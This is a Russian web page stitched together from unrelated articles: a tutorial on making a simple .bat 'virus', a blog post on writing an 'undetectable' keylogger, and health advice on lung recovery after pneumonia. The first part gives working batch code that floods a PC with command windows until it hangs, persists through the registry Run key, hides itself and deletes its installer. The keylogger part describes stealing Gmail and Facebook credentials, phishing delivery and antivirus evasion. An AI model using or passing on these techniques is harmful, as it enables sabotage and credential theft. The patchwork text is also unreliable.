Как сделать вирус легко

Как создать, написать компьютерный вирус?

Как создать простой .bat вирус?

Создание самых простых вирусов не требует наличия специальных сред для разработки программ. И особых знаний, кстати, тоже. Создать вирусы довольно просто, если использовать для этого командную строку. Для этого нужно немного знать синтаксис командной строки и уметь создавать .bat-файлы.

Что такое .bat-файл и как его создать?

Если очень поверхностно, то это файлы с расширением .bat. Такие файлы несут в себе команды, которые должны быть выполнены командным интерпретатором Windows. Все те команды, которые можно выполнить в окне командной строки, можно вписать в .bat-файл и запустить. Результат будет одинаковым.

Чтобы создать .bat-вирус, нам нужен обычный текстовый редактор. В идеале подойдет для этих целей Блокнот. Создав и открыв новый текстовый документ, Вам нужно вписать туда тот код(команды), которые он должен выполнить. После этого, Вам нужно с помощью меню Сохранить как сохранить этот файл, задав ему какое-либо имя с расширением .bat и указав тип файла Все файлы.

Создаем простейший вирус

В данной статье мы рассмотрим создание вируса, который после своего запуска будет бесконечно открывать окно командной строки. Бесконечно и очень быстро открывающиеся окна командной строки не дадут пользователю спокойно работать. Закрыть их всех не успеет никто и очень скоро они забьют оперативную память компьютера, что в свою очередь сильно затормозит работу компьютера, вплоть до полного зависания. Выглядеть это будет приблизительно так:

Вдобавок, мы закинем наш вирус в автозагрузку, что обеспечит автоматический запуск вируса вместе с операционной системой.

Код создаваемого вируса

Сколько программистов, столько разных решений можно придумать для каждой задачи. Я приведу один из своих методов решения такой задачи.

[code]md c:\papka
echo start c:\papka\virus.bat>c:\papka\virus.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat
attrib +r +h +s c:\papka
attrib +r +h +s c:\papka\virus.bat
start c:\papka\virus.bat
del %0[/code]

А теперь разберем сам код. Первая строчка создает папку с именем papka в корне диска C:/. Такой адрес приведен только для примера. Использование же корня папки C:/ не совсем хороший вариант для вируса. Если Вы хотите обеспечить хорошую выживаемость Вашему вирусу, лучше всего спрятать его подальше. Первую команду можно даже пропустить, если Вы закинете сам вирус в уже созданную директорию.

Вторая строчка создает файл c:\papka\virus.bat и, с помощью команды echo, вписывает в него команду start c:\papka\virus.bat. Тут нужно знать, что после знака > указывается место вывода приведенной команды. Тут Вам нужно познакомится: c:\papka\virus.bat и есть основное тело вируса. Созданный нами .bat-файл с кодом, который мы сейчас разбираем, является всего лишь установщиком нашего основного вируса. Вы можете использовать другое название и другое местоположение для вируса.

Третья строчка закидывает созданный нами во второй строчке тело вируса в автозагрузку. Для этого используется пользовательская ветка реестра, так как к ней у пользователя всегда есть доступ. А вот использовать автозагрузку компьютера не безопасно, так как пользователь может не иметь административного доступа, что вызовет ненужную ошибку.

Четвертая и пятая строка кода изменяют атрибуты вируса и папки, где хранится вирус. Данными командами, а для этого используется команда attrib, мы добавляем атрибуты Только чтение, Скрытый и Системный и для папки, и для вируса. Использование атрибута r(Только чтение) необязательно. А вот атрибуты Скрытый и Системный хорошо защитят созданный нами вирус. Если не верите, то почитайте статью про вирус, который превращает папки на флешке в ярлыки. Он использует именно эту технологию.

6-ая строчка кода запускает наш вирус. Вы можете пропустить этот пункт, если хотите, чтобы первый запуск вируса произошел только после перезагрузки компьютера.

И, наконец-то, последняя, 7-ая строчка удаляет данный .bat-вирус. Это полезно, так как по этому .bat-файлу можно спокойно выйти на созданный нами вирус и удалить его.

Смысл созданного вируса

Смысл вируса, который уместился в эти 7 строк — создать основной вирус, защитить его и обеспечить его постоянную работу. А так же подмести свои следы. А что делает основной вирус? После запуска основного вируса, он выполняет ту команду, которая вписана в нее. А это команда, в свою очередь, запускает наш вирус, который опять-таки снова запускает самого себя. И так до бесконечности.

Как бороться с такими вирусами?

Во-первых, начало борьбы с данным вирусом начнется после того, как он запуститься. Очень скоро вирус заполнит своими копиями оперативную память и Вы даже мышкой шевельнуть не сможете. Поэтому, такой спектакль нужно пресекать сразу. Для этого прекрасно подойдет кнопка Break на клавиатуре. Жмите ее столько, сколько понадобится, чтобы новые копии перестали создаваться. На клавиатурах без кнопки Break, может помочь сочетание клавиш Ctrl+C.

Как удалить такой вирус?

Вы можете найти и удалить вирус через его запись в автозагрузке(подробнее по ссылке). А так же Вы можете выйти на вирус по команде, которая будет высвечиваться в окне командного интерпретатора. Естественно, если Вы сможете добраться до скрытого и системного файла. Вот таким образом происходит создание простого вируса.

Источник

Пишем свое вредоносное ПО. Часть 1: Учимся писать полностью «не обнаружимый» кейлогер

Хакерский мир можно условно разделить на три группы атакующих:

1) «Skids» (script kiddies) – малыши, начинающие хакеры, которые собирают известные куски кода и утилиты и используя их создают какое-то простое вредоносное ПО.

2) «Byuers» — не чистые на руку предприниматели, тинэйджеры и прочие любители острых ощущений. Покупают услуги по написанию такого ПО в интернете, собирают с ее помощью различную приватную информацию, и, возможно, перепродают ее.

3) «Black Hat Сoders» — гуру программирования и знатоки архитектур. Пишут код в блокноте и разрабатывают новые эксплоиты с нуля.

Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО.

Зачем ИБ-персоналу эти сомнительные навыки?

Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно.

Для этого неформального класса «hacking 101» вам необходимы небольшие знания в программировании (С# и java) и базовое понимание архитектуры Windows. Имейте ввиду, что в реальности вредоносное ПО пишется на C/C++/Delphi, чтобы не зависеть от фреймфорков.

Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.
Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.

Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили.

Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#:

Вы можете изучить больше про фунцию GetAsyncKeyState на MSDN:

Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:

Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются злоумышленнику.

Умный кейлогер

Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?
Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.

Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я увеличиваю шансы получения учетных данных.

Вторая версия кода:

Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры.

Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail.

Еще более умный кейлогер

Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.

Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:

Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (т найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли.
Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения.

Для C# это выглядит так:

Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.

Бесплатно и полностью не обнаружим

В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут.
Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения.

Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ?

Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось.

В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим. На этой странице вы можете ознакомиться с полным анализом.

Основная цель этой статьи – показать, что используя одни только антивирусы вы не сможете полностью обеспечить безопасность на предприятии. Нужен более глубинная оценка действий всех пользователей и даже сервисов, чтобы выявить потенциально вредоносные действия.

В следующих статья я покажу, как сделать действительно не обнаружимую версию такого ПО.

Источник

Лучшие способы восстановить легкие после пневмонии

Основная цель врачей во время госпитализации — вылечить пневмонию до такой степени, чтобы вы стали достаточно сильными, чтобы продолжить выздоровление дома. Вас выпишут, когда температура, частота дыхания, частота сердечных сокращений, показания артериального давления и уровни кислорода в крови будут находиться в пределах нормы. Ваш аппетит и уровень концентрации также должны улучшиться.

Но возвращение домой не означает, что вы полностью исцелены. В ближайшее время вы, к сожалению, не будете участвовать ни в каких марафонах. Ваша функция легких может отличаться от той, что была до пневмонии. Но вы можете полностью восстановиться до того уровня активности, который был до постановки диагноза.

К сожалению, у многих людей, чьи легкие были повреждены пневмонией (особенно – коронавирусной), уровень активности может никогда не быть прежним.

Пневмония — серьезная инфекция, которая может повредить легочную ткань. Ваши легкие могут не расширяться полностью, когда вы дышите, или некоторая часть легочной ткани может быть необратимо повреждена. Это может повлиять на количество поступающего кислорода и количество углекислого газа, покидающего тело. Это может вызвать у вас чувство усталости, а иногда и одышку.

После пневмонии часто возникает мышечная слабость. Это может произойти и из-за отсутствия активности и возможного похудения.

Кроме того, люди, у которых есть дополнительные проблемы, такие как болезни легких или сердца, часто испытывают усиление симптомов этих состояний. В этих случаях вам также могут назначить домашний кислород.

Ваш врач даст инструкции, которым нужно следовать, чтобы постепенно приходить в себя уже дома. Это может быть прием лекарств, постепенное увеличение уровня физической активности и выполнение дыхательных упражнений.

Восстановление после коронавирусной пневмонии

Для многих пациентов с COVID-19 избавление от вируса — только половина победы. Многие до сих пор страдают от неприятных последствий, при которых вирус SARS-COV-2 поражает жизненно важные органы, особенно легкие.

Нарушения функции легких, пневмония, снижение насыщения крови кислородом и одышка, фиброз легких и хроническая легочная недостаточность — одно из самых серьезных повреждений, которые COVID-19 наносит легким. Люди с хроническими респираторными заболеваниями и ослабленным иммунитетом особенно страдают.

После COVID-19 часто возникает респираторный дистресс. Даже молодые и здоровые пациенты сообщают об ухудшении функции легких после восстановления, некоторым также требуются аппараты для кислородной поддержки и искусственной вентиляции, которые также могут нарушить качество жизни. Острые респираторные заболевания и снижение иммунитета могут сделать человека склонным к другим проблемам. Экологические факторы, такие как высокие уровни загрязнения воздуха, также усугубляют ситуацию.

Мы предлагаем вам список мер, которые необходимо соблюдать для защиты здоровья легких после COVID-19.

Регулярно выполняйте дыхательные упражнения

Одышка и затрудненный поток кислорода являются частыми симптомами инфекции, поскольку COVID-19 начинает атаковать легкие. Пациентов с COVID часто просят практиковать простые упражнения на глубокое дыхание и медитативные позы, которые могут помочь им лучше дышать и улучшить приток крови к легким и бронхам.

Диафрагмальное дыхание, глубокие дыхательные движения способствуют более глубокому вдоху и движению мышц в легких и груди. Глубокие вдохи в положении лежа на животе также могут помочь увеличить приток кислорода.

Пранаяма считается прекрасным упражнением для улучшения работы легких. Пациенты, страдающие проблемами дыхания и колебаниями уровня кислорода могут тренироваться с использованием респирометра, что также способствует улучшению здоровья легких.

Ешьте продукты, которые увеличивают объем легких

Хорошая диета, богатая витаминами и минералами, повышает иммунитет. Есть определенные продукты, которые выводят токсины и помогают легче дышать. Это простой способ улучшить здоровье легких в домашних условиях.

Следует избегать чрезмерного употребления переработанных и рафинированных продуктов, делать ставку на сезонные продукты, такие как: свекла, зеленый чай, черника, помидоры, орехи и семена, они увеличивают объем легких. Апельсины, лимоны и цитрусовые продукты тоже должны быть в изобилии. Чеснок и куркума — мощные продукты, богатые антиоксидантами, которые, как говорят, обладают противовирусными свойствами.

Обязательно употребляйте много продуктов, богатых омега-3, которые особенно полезны для контроля воспаления в легких и снижения риска других респираторных заболеваний.

Эксперты также рекомендуют людям следить за питательными веществами. Необходим отказ от диет, способствующих снижению веса, которые могут лишить вас необходимых питательных веществ на некоторое время после выздоровления.

Избегайте курения

Курение не только повышает риск заражения и передачи COVID, но и наносит непоправимый вред легким, которые и без того уязвимы. Курение и табак вызывают дополнительную нагрузку на ваши жизненно важные органы, увеличивают вероятность развития других легочных проблем и инфекций в долгосрочной перспективе.

Кардиотренировки могут улучшить дыхательную функцию

Любая деятельность, которая увеличивает ваше дыхание, — это хороший способ восстановить емкость и функцию легких, когда вы находитесь на пути к выздоровлению. Эксперты предлагают пациентам заниматься умеренными или быстрыми физическими упражнениями или спортом. Это может повысить частоту сердечных сокращений и улучшить кровоток.

Регулярно гуляйте (если это безопасно), выбирайте домашние тренировки и кардио упражнения, которые полезны для вашего респираторного здоровья. Асаны йоги также могут помочь восстановить функциональность и повысить иммунитет. Также могут помочь аэробные упражнения.

Не забывайте регулярно тренироваться, но сначала делайте это медленно. Спортсменам также рекомендуется начать восстановление с реабилитационных упражнений, которые приносят пользу здоровью легких, прежде чем переходить к другим быстрым и интенсивным движениям.

Избегайте воздействия загрязнений и дыма

Людям, которые только что вылечились от COVID-19 или у которых нарушена функция легких, следует избегать ненужного воздействия дыма, загрязненной окружающей среды и любой деятельности, которая может помешать функционированию дыхательной системы. Загрязнение может не только увеличить риск повторного заражения, но и подвергнуть вас воздействию канцерогенов и других потенциально опасных раздражителей, которые могут оседать в полостях легких и затруднять дыхание.

Если вам необходимо выйти, соблюдайте все необходимые меры предосторожности, примите лекарства и позаботьтесь о себе. Паровые ингаляции и методы детоксикации также могут оказаться полезными.

Источник